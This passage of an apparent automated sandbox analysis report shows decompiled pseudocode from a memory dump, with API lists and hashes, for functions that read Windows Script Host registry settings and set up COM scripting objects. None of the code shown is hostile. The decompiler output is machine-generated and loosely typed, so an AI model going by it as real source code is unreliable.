                                                        								if(_t34 < 0x1c) {
                                                        									continue;
                                                        								}
                                                        								goto L7;
                                                        							}
                                                        							 *0xb974cc =  *((intOrPtr*)(0xb942dc + _t34 * 8));
                                                        						}
                                                        					}
                                                        					L7:
                                                        					_pop(_t33);
                                                        				}
                                                        				_t17 =  *0xb974cc; // 0x0
                                                        				return E00B81335(_t17, _t27, _v8 ^ _t35, _t30, _t31, _t33);
                                                        			}






















                                                        APIs
                                                        • RegOpenKeyExW.ADVAPI32 ref: 00B94263
                                                        • RegQueryValueExW.ADVAPI32(?,Locale,00000000,00000000,00B94C78,00000006), ref: 00B94280
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B9428B
                                                        • _wcsnicmp.MSVCRT ref: 00B942A3
                                                        Strings
                                                        • Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}, xrefs: 00B94252
                                                        • Locale, xrefs: 00B94278
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue_wcsnicmp
                                                        • String ID: Locale$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
                                                        • API String ID: 2262609651-1161606707
                                                        • Opcode ID: 3c6eb32f08459a1f4b8dce6e38aa006e6bd8a470498448996950e739e6fc1bb8
                                                        • Instruction ID: 8d9d4bef60bbae9f366424ae62bcc22187bd46b91b67816d203b391828019f40
                                                        • Opcode Fuzzy Hash: 3c6eb32f08459a1f4b8dce6e38aa006e6bd8a470498448996950e739e6fc1bb8
                                                        • Instruction Fuzzy Hash: 04118C35951119AACF10ABA49D08EEF7BECFB08760F0004A5F902A3261EB30CA46CB64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 79%
                                                        			E00B842B5(void* _a4, short* _a8, short* _a12, int _a16) {
                                                        				signed int _v8;
                                                        				int _v12;
                                                        				int _v16;
                                                        				int* _v20;
                                                        				void* _v32;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t42;
                                                        				long _t48;
                                                        				int _t51;
                                                        				int _t52;
                                                        				int _t55;
                                                        				signed int _t57;
                                                        				signed int _t68;
                                                        				int _t70;
                                                        				char* _t71;
                                                        				signed int _t73;
                                                        				int _t74;
                                                        				intOrPtr _t76;
                                                        
                                                        				_t42 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t42 ^ _t73;
                                                        				_t76 =  *0xb97001; // 0x0
                                                        				if(_t76 == 0) {
                                                        					__eflags = _a8;
                                                        					if(_a8 == 0) {
                                                        						_v20 = 0;
                                                        						L18:
                                                        						_t71 = _a16 + 1;
                                                        						E00B8320B(_t71);
                                                        						_t70 = _t74;
                                                        						_v12 = _t71;
                                                        						_t48 = RegQueryValueExA(_a4, _v20, 0,  &_v16, _t70,  &_v12);
                                                        						__eflags = _t48;
                                                        						if(__eflags != 0) {
                                                        							L8:
                                                        							if(__eflags > 0) {
                                                        								_t48 = _t48 & 0x0000ffff | 0x80070000;
                                                        							}
                                                        							L6:
                                                        							return E00B81335(_t48, 0, _v8 ^ _t73, _t69, _t70, _t71);
                                                        						}
                                                        						__eflags = _v16 - 1;
                                                        						if(_v16 == 1) {
                                                        							L21:
                                                        							_t51 = _v12;
                                                        							__eflags =  *(_t70 + _t51 - 1);
                                                        							if( *(_t70 + _t51 - 1) != 0) {
                                                        								L7:
                                                        								_t48 = 0x80040153;
                                                        								goto L6;
                                                        							}
                                                        							_t52 = MultiByteToWideChar(0, 0, _t70, 0xffffffff, _a12, _a16);
                                                        							__eflags = _t52;
                                                        							if(_t52 != 0) {
                                                        								L5:
                                                        								_t48 = 0;
                                                        								goto L6;
                                                        							}
                                                        							L14:
                                                        							_t48 = GetLastError();
                                                        							__eflags = _t48;
                                                        							goto L8;
                                                        						}
                                                        						__eflags = _v16 - 2;
                                                        						if(_v16 != 2) {
                                                        							goto L7;
                                                        						}
                                                        						goto L21;
                                                        					}
                                                        					_t71 = WideCharToMultiByte;
                                                        					_t70 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                        					__eflags = _t70;
                                                        					if(_t70 != 0) {
                                                        						E00B8320B(_t53);
                                                        						_v20 = _t74;
                                                        						_t55 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, _v20, _t70, 0, 0);
                                                        						__eflags = _t55;
                                                        						if(_t55 == 0) {
                                                        							goto L14;
                                                        						}
                                                        						goto L18;
                                                        					}
                                                        					goto L14;
                                                        				}
                                                        				_push( &_v20);
                                                        				_t57 = _a16;
                                                        				_t68 = 2;
                                                        				_t69 = _t57 * _t68 >> 0x20;
                                                        				_push(_t57 * _t68 >> 0x20);
                                                        				_push(_t57 * _t68);
                                                        				if(E00B8434F() < 0) {
                                                        					goto L7;
                                                        				}
                                                        				_t71 = _a12;
                                                        				_v12 = _v20;
                                                        				_t48 = RegQueryValueExW(_a4, _a8, 0,  &_v16, _t71,  &_v12);
                                                        				if(_t48 != 0) {
                                                        					goto L8;
                                                        				}
                                                        				if(_v16 != 1) {
                                                        					__eflags = _v16 - 2;
                                                        					if(_v16 == 2) {
                                                        						goto L4;
                                                        					}
                                                        					goto L7;
                                                        				}
                                                        				L4:
                                                        				if(_t71[(_v12 >> 1) * 2 - 2] != 0) {
                                                        					goto L7;
                                                        				}
                                                        				goto L5;
                                                        			}

                                                        APIs
                                                        • RegQueryValueExW.ADVAPI32(74BA46CE,?,00000000,?,00020019,74BA46CE), ref: 00B8430C
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00020019,80000000,?,00020019,?,74BA46CE), ref: 00B8972A
                                                        • GetLastError.KERNEL32(?,000000FF,00020019,?,?,74BA46CE,00020019,80000000,?,00020019), ref: 00B89732
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 00B89751
                                                        • RegQueryValueExA.ADVAPI32 ref: 00B8977C
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00020019,?,?,74BA46CE,00020019,80000000,?,00020019), ref: 00B897B2
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$QueryValue$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2978555403-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 54%
                                                        			E00B82C23(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                                        				signed int _v8;
                                                        				char _v12;
                                                        				char _v16;
                                                        				char _v20;
                                                        				char _v24;
                                                        				void* _v36;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t33;
                                                        				void* _t44;
                                                        				void* _t48;
                                                        				int _t50;
                                                        				intOrPtr* _t63;
                                                        				intOrPtr* _t64;
                                                        				void* _t65;
                                                        				signed int _t67;
                                                        				intOrPtr _t68;
                                                        
                                                        				_t60 = __edx;
                                                        				_t33 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t33 ^ _t67;
                                                        				_t35 = _a4;
                                                        				_t56 = 0;
                                                        				_v20 = 0;
                                                        				_v16 = 0;
                                                        				_v12 = 0;
                                                        				if( *((intOrPtr*)(_a4 + 0x20)) == 0) {
                                                        					if(E00B83A91(__edx,  &_v20, _a12) != 0) {
                                                        						_v24 =  &_a16;
                                                        						_t44 = E00B82CB9(__edx, _v20,  &_v12,  &_v24);
                                                        						_v24 = 0;
                                                        						if(_t44 >= 0) {
                                                        							if(_a8 != 0) {
                                                        								if(E00B83A91(__edx,  &_v16, _a8) == 0) {
                                                        									goto L4;
                                                        								} else {
                                                        									_t64 = __imp__#7;
                                                        									_t48 =  *_t64(_v12);
                                                        									_t65 = _t48 +  *_t64();
                                                        									_t61 = E00B877AC;
                                                        									_t50 = lstrlenW(E00B877AC);
                                                        									_t29 = _t65 + 1; // 0x1
                                                        									_t66 = _t50 + _t29;
                                                        									E00B8320B(_t50 + _t29 + _t50 + _t29, _v16);
                                                        									_t56 = _t68;
                                                        									E00B831BD(_t68, _t66, _v16);
                                                        									E00B836CD(_t68, _t66, E00B877AC);
                                                        									E00B836CD(_t56, _t66, _v12);
                                                        									goto L5;
                                                        								}
                                                        								goto L7;
                                                        							} else {
                                                        								L4:
                                                        								_t56 = _v12;
                                                        							}
                                                        							L5:
                                                        							E00B819DE(_a4, _t56);
                                                        						}
                                                        					}
                                                        					_t63 = __imp__#6;
                                                        					 *_t63(_v20);
                                                        					 *_t63(_v16);
                                                        					_t35 =  *_t63(_v12);
                                                        				}
                                                        				L7:
                                                        				return E00B81335(_t35, _t56, _v8 ^ _t67, _t60, _t61, _t63);
                                                        			}

                                                        APIs
                                                          • Part of subcall function 00B83A91: LoadStringW.USER32(?,?,00000800,?), ref: 00B83ADB
                                                          • Part of subcall function 00B83A91: SysAllocString.OLEAUT32(?), ref: 00B83AF2
                                                        • SysFreeString.OLEAUT32(?), ref: 00B82C96
                                                        • SysFreeString.OLEAUT32(?), ref: 00B82C9B
                                                        • SysFreeString.OLEAUT32(?), ref: 00B82CA0
                                                          • Part of subcall function 00B82CB9: FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00B8F6DE,?,?,?), ref: 00B82CF7
                                                          • Part of subcall function 00B82CB9: SysAllocString.OLEAUT32(?), ref: 00B82D08
                                                          • Part of subcall function 00B82CB9: LocalFree.KERNEL32(?,?,?,?,00B8F6DE,?,?,?), ref: 00B82D32
                                                        • SysStringLen.OLEAUT32(?), ref: 00B87761
                                                        • SysStringLen.OLEAUT32(?), ref: 00B87768
                                                        • lstrlenW.KERNEL32(00B877AC), ref: 00B87773
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: String$Free$Alloc$FormatLoadLocalMessagelstrlen
                                                        • String ID:
                                                        • API String ID: 2525758188-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 96%
                                                        			E00B8453E(void* __eax, intOrPtr _a4, void** _a8) {
                                                        				void* _t14;
                                                        				signed int _t15;
                                                        				void* _t19;
                                                        				signed int _t22;
                                                        				signed int _t30;
                                                        				void* _t31;
                                                        
                                                        				_push(0x20);
                                                        				L00B82877();
                                                        				if(__eax == 0) {
                                                        					_t31 = 0;
                                                        				} else {
                                                        					_t31 = E00B845F5(__eax);
                                                        				}
                                                        				if(_t31 == 0) {
                                                        					_t30 = 0x8007000e;
                                                        					L9:
                                                        					return _t30;
                                                        				} else {
                                                        					 *((intOrPtr*)(_t31 + 8)) = _a4;
                                                        					_t14 = CreateEventA(0, 0, 0, 0);
                                                        					 *(_t31 + 0x1c) = _t14;
                                                        					if(_t14 == 0) {
                                                        						L12:
                                                        						_t15 = GetLastError();
                                                        						if(_t15 > 0) {
                                                        							_t15 = _t15 & 0x0000ffff | 0x80070000;
                                                        						}
                                                        						_t30 = _t15;
                                                        						L8:
                                                        						if(_t31 != 0) {
                                                        							E00B85F27(_t31, 1);
                                                        						}
                                                        						goto L9;
                                                        					}
                                                        					_t4 = _t31 + 0x14; // 0x14
                                                        					_t19 = CreateThread(0, 0, E00B82516, _t31, 0, _t4);
                                                        					 *(_t31 + 0x10) = _t19;
                                                        					if(_t19 == 0) {
                                                        						goto L12;
                                                        					}
                                                        					E00B824CF( *(_t31 + 0x1c), 0, 0xffffffff, 0xff);
                                                        					CloseHandle( *(_t31 + 0x1c));
                                                        					_t22 =  *(_t31 + 0xc);
                                                        					 *(_t31 + 0x1c) = 0;
                                                        					if(_t22 > 0) {
                                                        						_t22 = _t22 & 0x0000ffff | 0x80070000;
                                                        					}
                                                        					_t30 = _t22;
                                                        					if(_t30 >= 0) {
                                                        						 *_a8 = _t31;
                                                        						_t31 = 0;
                                                        						_t30 = 0;
                                                        					}
                                                        					goto L8;
                                                        				}
                                                        			}










                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B84548
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00B84527,?,?,?,?,?,?), ref: 00B84573
                                                        • CreateThread.KERNEL32(00000000,00000000,00B82516,00000000,00000000,00000014), ref: 00B84591
                                                        • CloseHandle.KERNEL32(?), ref: 00B845B5
                                                          • Part of subcall function 00B845F5: GetCurrentThreadId.KERNEL32(?,00B8455F,?,?,?,?,00B84527,?,?,?,?,?,?), ref: 00B8460B
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CreateThread$??2@CloseCurrentEventHandle
                                                        • String ID:
                                                        • API String ID: 2455320809-0
                                                        • Opcode ID: 5e7a31020d152ecacb311c6862d04e2570ecfbbf7581862434f472d34ddea28f
                                                        • Instruction ID: 95c1cbc7d376c8c3acf91b5b11d066b6fcf3095eb0685f4e4d76ed26b39995f9
                                                        • Opcode Fuzzy Hash: 5e7a31020d152ecacb311c6862d04e2570ecfbbf7581862434f472d34ddea28f
                                                        • Instruction Fuzzy Hash: A721AE72600216AFD7307F659CC4ABEBAE8EB507A4B644A79F616C7670CA34CC45C7A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00B93FF0(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                        				signed int _t19;
                                                        				void* _t21;
                                                        				void* _t22;
                                                        
                                                        				if(_a4 != 0) {
                                                        					if(_a8 == 0) {
                                                        						return LoadLibraryExW(_a4, 0, 0 | _a12 != 0x00000000);
                                                        					}
                                                        					_t22 = CreateFileW(_a4, 0x80000000, 5, 0, 3, 0, 0);
                                                        					if(_t22 == 0xffffffff) {
                                                        						goto L1;
                                                        					}
                                                        					_t21 = CreateFileMappingW(_t22, 0, 8, 0, 0, 0);
                                                        					CloseHandle(_t22);
                                                        					if(_t21 == 0) {
                                                        						goto L1;
                                                        					}
                                                        					_a4 = MapViewOfFile(_t21, 1, 0, 0, 0);
                                                        					CloseHandle(_t21);
                                                        					_t19 = _a4;
                                                        					if(_t19 == 0) {
                                                        						goto L1;
                                                        					}
                                                        					return _t19 | 0x00000001;
                                                        				}
                                                        				L1:
                                                        				return 0;
                                                        			}







                                                        APIs
                                                        • CreateFileW.KERNEL32(00000001,80000000,00000005,00000000,00000003,00000000,00000000), ref: 00B94017
                                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,00B94F4F,?,00000001,00000000), ref: 00B9402B
                                                        • CloseHandle.KERNEL32(00000000), ref: 00B9403A
                                                        • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00B94F4F,?,00000001,00000000), ref: 00B94046
                                                        • CloseHandle.KERNEL32(00000000), ref: 00B94050
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: File$CloseCreateHandle$MappingView
                                                        • String ID:
                                                        • API String ID: 1095920306-0
                                                        • Opcode ID: 2108aa4f4abe01810d64eed018d1f5f7617c2c996f5ff3f0cf271d7ec3736927
                                                        • Instruction ID: 7ed84e73fe8c5287dd448632bb0c3743bd327d59bbf0c1b640c605c6fad46221
                                                        • Opcode Fuzzy Hash: 2108aa4f4abe01810d64eed018d1f5f7617c2c996f5ff3f0cf271d7ec3736927
                                                        • Instruction Fuzzy Hash: 48018431502224BBCB311B269C4CEAB7EACEF46BF1F104461F908961A0CB718982DBE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 51%
                                                        			E00B851E5(intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                        				signed int _v8;
                                                        				char _v24;
                                                        				void* _v28;
                                                        				intOrPtr* _v32;
                                                        				intOrPtr* _v36;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t37;
                                                        				intOrPtr* _t39;
                                                        				intOrPtr* _t40;
                                                        				intOrPtr* _t45;
                                                        				char* _t48;
                                                        				char* _t50;
                                                        				char* _t52;
                                                        				intOrPtr* _t53;
                                                        				intOrPtr _t54;
                                                        				intOrPtr* _t55;
                                                        				intOrPtr _t56;
                                                        				intOrPtr* _t57;
                                                        				intOrPtr _t58;
                                                        				intOrPtr* _t59;
                                                        				intOrPtr _t60;
                                                        				intOrPtr* _t61;
                                                        				intOrPtr _t62;
                                                        				intOrPtr* _t63;
                                                        				intOrPtr _t64;
                                                        				intOrPtr* _t65;
                                                        				intOrPtr _t66;
                                                        				char _t68;
                                                        				intOrPtr _t70;
                                                        				intOrPtr _t71;
                                                        				intOrPtr* _t74;
                                                        				intOrPtr* _t93;
                                                        				signed int _t94;
                                                        
                                                        				_t37 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t37 ^ _t94;
                                                        				_t39 = _a12;
                                                        				_t74 = _a4;
                                                        				_push(0x54);
                                                        				_v36 = _t39;
                                                        				_v32 = 0;
                                                        				_v28 = 0;
                                                        				L00B82877();
                                                        				_t95 = _t39;
                                                        				if(_t39 == 0) {
                                                        					_t93 = 0;
                                                        				} else {
                                                        					_t93 = E00B8541A(_t39, _t95, 0);
                                                        				}
                                                        				if(_t93 == 0) {
                                                        					_t92 = 0x8007000e;
                                                        				} else {
                                                        					_t7 = _t93 + 0x30; // 0x30
                                                        					_t48 = E00B818C4(_t7, 0x1000);
                                                        					_t92 = _t48;
                                                        					if(_t48 < 0) {
                                                        						L15:
                                                        						_t40 = _v28;
                                                        						if(_t40 != 0) {
                                                        							 *((intOrPtr*)( *_t40 + 8))(_t40);
                                                        						}
                                                        						if(_t93 != 0) {
                                                        							__eflags = _v32;
                                                        							if(_v32 != 0) {
                                                        								_t45 =  *((intOrPtr*)(_t93 + 0x24));
                                                        								 *((intOrPtr*)( *_t45 + 0x1c))(_t45);
                                                        							}
                                                        							 *((intOrPtr*)( *_t93 + 8))(_t93);
                                                        							goto L18;
                                                        						} else {
                                                        							L18:
                                                        							return E00B81335(_t92, _t74, _v8 ^ _t94, _t90, _t92, _t93);
                                                        						}
                                                        					}
                                                        					 *((intOrPtr*)(_t93 + 0x2c)) = _a8;
                                                        					_t50 =  &_v24;
                                                        					__imp__CLSIDFromString(_t74, _t50);
                                                        					_t92 = _t50;
                                                        					if(_t50 < 0) {
                                                        						goto L15;
                                                        					}
                                                        					_t52 =  &_v24;
                                                        					__imp__CoCreateInstance(_t52, 0, 0x17, 0xb815b8,  &_v28);
                                                        					_t92 = _t52;
                                                        					if(_t52 < 0) {
                                                        						goto L15;
                                                        					}
                                                        					_t53 = _v28;
                                                        					_t14 = _t93 + 0x24; // 0x24
                                                        					_t74 = _t14;
                                                        					_t54 =  *((intOrPtr*)( *_t53))(_t53, 0xb85374, _t74);
                                                        					_t92 = _t54;
                                                        					if(_t54 < 0) {
                                                        						goto L15;
                                                        					}
                                                        					_t55 = _v28;
                                                        					_t90 =  *_t55;
                                                        					_t16 = _t93 + 0x28; // 0x28
                                                        					_t56 =  *((intOrPtr*)( *_t55))(_t55, 0xb85384, _t16);
                                                        					_t92 = _t56;
                                                        					if(_t56 < 0) {
                                                        						goto L15;
                                                        					}
                                                        					_t57 =  *_t74;
                                                        					_t58 =  *((intOrPtr*)( *_t57 + 0xc))(_t57, _t93);
                                                        					_t92 = _t58;
                                                        					if(_t58 < 0) {
                                                        						goto L15;
                                                        					}
                                                        					_t59 =  *((intOrPtr*)(_t93 + 0x28));
                                                        					_v32 = 1;
                                                        					_t60 =  *((intOrPtr*)( *_t59 + 0xc))(_t59);
                                                        					_t92 = _t60;
                                                        					if(_t60 < 0) {
                                                        						goto L15;
                                                        					}
                                                        					_t61 =  *_t74;
                                                        					_t62 =  *((intOrPtr*)( *_t61 + 0x20))(_t61, L"WScript", 2);
                                                        					_t92 = _t62;
                                                        					if(_t62 < 0) {
                                                        						goto L15;
                                                        					}
                                                        					_t63 =  *_t74;
                                                        					_t64 =  *((intOrPtr*)( *_t63 + 0x20))(_t63, L"WSH", 2);
                                                        					_t92 = _t64;
                                                        					if(_t64 < 0) {
                                                        						goto L15;
                                                        					}
                                                        					_t65 =  *_t74;
                                                        					_t66 =  *((intOrPtr*)( *_t65 + 0x14))(_t65, 5);
                                                        					_t92 = _t66;
                                                        					if(_t66 < 0) {
                                                        						goto L15;
                                                        					}
                                                        					_t68 =  *((intOrPtr*)(_a8 + 0x23));
                                                        					 *((char*)(_t93 + 0x50)) = _t68;
                                                        					if(_t68 != 0) {
                                                        						_t74 =  *_t74;
                                                        						_t32 = _t93 + 0x4c; // 0x4c
                                                        						_t70 =  *((intOrPtr*)( *_t74))(_t74, 0xb88bdc, _t32);
                                                        						_t92 = _t70;
                                                        						__eflags = _t92;
                                                        						if(_t92 < 0) {
                                                        							goto L15;
                                                        						}
                                                        					}
                                                        					 *0xb97018 =  *0xb97018 + 1;
                                                        					_t71 =  *0xb97018; // 0x0
                                                        					 *((intOrPtr*)(_t93 + 0x20)) = _t71;
                                                        					 *_v36 = _t93;
                                                        					_t93 = 0;
                                                        					_t92 = 0;
                                                        				}
                                                        			}







































                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B8520D
                                                          • Part of subcall function 00B818C4: GetProcessHeap.KERNEL32(00000000,?), ref: 00B818E8
                                                          • Part of subcall function 00B818C4: HeapAlloc.KERNEL32(00000000), ref: 00B818EB
                                                        • CLSIDFromString.OLE32(74BA46CE,00000100), ref: 00B8524F
                                                        • CoCreateInstance.OLE32(00000100,00000000,00000017,00B815B8,00000000), ref: 00B85270
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Heap$??2@AllocCreateFromInstanceProcessString
                                                        • String ID: WSH$WScript
                                                        • API String ID: 829307797-1019903269
                                                        • Opcode ID: 1a3eb14eb4380b31dc8493c9d6f938fdf86b21b87f2ccc508d661451e4876022
                                                        • Instruction ID: 3a4e3f14b887fea3096500f1d505fde071482112c293d24776107155233a22ba
                                                        • Opcode Fuzzy Hash: 1a3eb14eb4380b31dc8493c9d6f938fdf86b21b87f2ccc508d661451e4876022
                                                        • Instruction Fuzzy Hash: BF519275600A059FC721EF68C895E9AB7F9FF88750B150898E956DB360EF71EC02CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 64%
                                                        			E023114C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                        				signed int _v8;
                                                        				char _v10;
                                                        				char _v140;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t24;
                                                        				void* _t26;
                                                        				signed int _t29;
                                                        				signed int _t34;
                                                        				signed int _t40;
                                                        				intOrPtr _t45;
                                                        				void* _t51;
                                                        				intOrPtr* _t52;
                                                        				void* _t54;
                                                        				signed int _t57;
                                                        				void* _t58;
                                                        
                                                        				_t51 = __edx;
                                                        				_t24 =  *0x23b2088; // 0x77da46ae
                                                        				_v8 = _t24 ^ _t57;
                                                        				_t45 = _a16;
                                                        				_t53 = _a4;
                                                        				_t52 = _a20;
                                                        				if(_a4 == 0 || _t52 == 0) {
                                                        					L10:
                                                        					_t26 = 0xc000000d;
                                                        				} else {
                                                        					if(_t45 == 0) {
                                                        						if( *_t52 == _t45) {
                                                        							goto L3;
                                                        						} else {
                                                        							goto L10;
                                                        						}
                                                        					} else {
                                                        						L3:
                                                        						_t28 =  &_v140;
                                                        						if(_a12 != 0) {
                                                        							_push("[");
                                                        							_push(0x41);
                                                        							_push( &_v140);
                                                        							_t29 = E02307707();
                                                        							_t58 = _t58 + 0xc;
                                                        							_t28 = _t57 + _t29 * 2 - 0x88;
                                                        						}
                                                        						_t54 = E023113CB(_t53, _t28);
                                                        						if(_a8 != 0) {
                                                        							_t34 = E02307707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                        							_t58 = _t58 + 0x10;
                                                        							_t54 = _t54 + _t34 * 2;
                                                        						}
                                                        						if(_a12 != 0) {
                                                        							_t40 = E02307707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                        							_t58 = _t58 + 0x10;
                                                        							_t54 = _t54 + _t40 * 2;
                                                        						}
                                                        						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                        						 *_t52 = _t53;
                                                        						if( *_t52 < _t53) {
                                                        							goto L10;
                                                        						} else {
                                                        							E022D2340(_t45,  &_v140, _t53 + _t53);
                                                        							_t26 = 0;
                                                        						}
                                                        					}
                                                        				}
                                                        				return E022DE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                        			}





















                                                        APIs
                                                        • ___swprintf_l.LIBCMT ref: 0233EA22
                                                          • Part of subcall function 023113CB: ___swprintf_l.LIBCMT ref: 0231146B
                                                          • Part of subcall function 023113CB: ___swprintf_l.LIBCMT ref: 02311490
                                                        • ___swprintf_l.LIBCMT ref: 0231156D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: 148958322b716580334a9901849d6e02883d7a3a84f2b2d3419beea50a07d715
                                                        • Instruction ID: a8c5dee8e56525c9e1d2409083013f1f0a677beff498e499dbbff1dfb4ae2fa5
                                                        • Opcode Fuzzy Hash: 148958322b716580334a9901849d6e02883d7a3a84f2b2d3419beea50a07d715
                                                        • Instruction Fuzzy Hash: 0F2193729102199BDB25DE98CC40AEAB3BDAF10704F444555FD8AD3144EB70EA588BE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 58%
                                                        			E00B83351(intOrPtr __ecx, void* __edx, void* __eflags) {
                                                        				void* _v8;
                                                        				void* _v12;
                                                        				void* _v16;
                                                        				intOrPtr _t19;
                                                        				intOrPtr _t20;
                                                        				intOrPtr _t34;
                                                        
                                                        				_t28 = __edx;
                                                        				_t27 = __ecx;
                                                        				_t30 = L"Software\\Microsoft\\Windows Script Host\\Settings";
                                                        				_v16 = 0;
                                                        				_v12 = 0;
                                                        				_v8 = 0;
                                                        				E00B83415(__ecx, __edx, 0x80000001, L"Software\\Microsoft\\Windows Script Host\\Settings", 0x20019,  &_v12);
                                                        				E00B83415(__ecx, __edx, 0x80000002, _t30, 0x20019,  &_v8);
                                                        				_t19 = E00B83249(_t27, L"Enabled", _v12, _v8, 1);
                                                        				if(_t19 == 0) {
                                                        					_t20 =  *0xb9702c; // 0x0
                                                        					_t27 =  *0xb97010; // 0x0
                                                        					_t19 = E00B8F342(_t27, _t20 + 0x14, 0xc88);
                                                        					goto L3;
                                                        				} else {
                                                        					_t34 =  *0xb97001; // 0x0
                                                        					if(_t34 != 0) {
                                                        						__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                        						L3:
                                                        						_v16 = _t19;
                                                        					}
                                                        				}
                                                        				if(_v8 != 0) {
                                                        					RegCloseKey(_v8);
                                                        				}
                                                        				if(_v12 != 0) {
                                                        					RegCloseKey(_v12);
                                                        				}
                                                        				if(_v16 < 0) {
                                                        					_push(0xc89);
                                                        					_push(1);
                                                        				} else {
                                                        					_push(0xbee);
                                                        					_push(0);
                                                        				}
                                                        				E00B8386A(_t27, _t28);
                                                        				return _v16;
                                                        			}










                                                        APIs
                                                          • Part of subcall function 00B83415: RegOpenKeyExW.ADVAPI32 ref: 00B83444
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00B833BE
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B833D5
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B833DF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Close$InitializeOpenSecurity
                                                        • String ID: Enabled$Software\Microsoft\Windows Script Host\Settings
                                                        • API String ID: 2119996383-4294085457
                                                        • Opcode ID: 354042e1776468125571e82586582f74ec1aa38e13692174b2570788139cc024
                                                        • Instruction ID: 3ac04b8c4f5cc8fbbcba11eb2dae7b98bfe2064fa850731dd3cc0a9053a3df47
                                                        • Opcode Fuzzy Hash: 354042e1776468125571e82586582f74ec1aa38e13692174b2570788139cc024
